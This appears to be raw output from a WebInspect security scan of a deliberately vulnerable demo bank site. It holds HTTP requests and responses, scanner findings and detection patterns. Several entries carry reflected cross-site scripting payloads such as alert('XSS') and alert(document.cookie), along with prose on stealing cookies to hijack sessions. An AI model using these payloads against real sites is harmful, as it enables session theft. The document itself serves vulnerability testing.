<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login: 333-333-3333test@test999.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4958
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login: 333-333-3333test@test999.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Login FormA possible login form was found.GET <var name="path"/>?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
type=['"]?password['"]?POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:08 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"><script>alert("XSS")</script><br>Please try again.
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>>"><script>alert("XSS")</script></attack><script>alert\("XSS"\)<\/script>GET /forgot2.asp?msg2=no&msg=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:03 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">--><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>--><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=test@<script>alert(document.cookie)</script>.com&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>test@<script>alert(document.cookie)</script>.com</attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /join.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3994
Content-Type: text/html
Cache-control: private
Set-Cookie: passes=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes3=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please provide us with the following details</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /join.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3994
Content-Type: text/html
Cache-control: private
Set-Cookie: passes=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes3=; path=/
<html>
<html>
<head>
<title>Join Us</title>
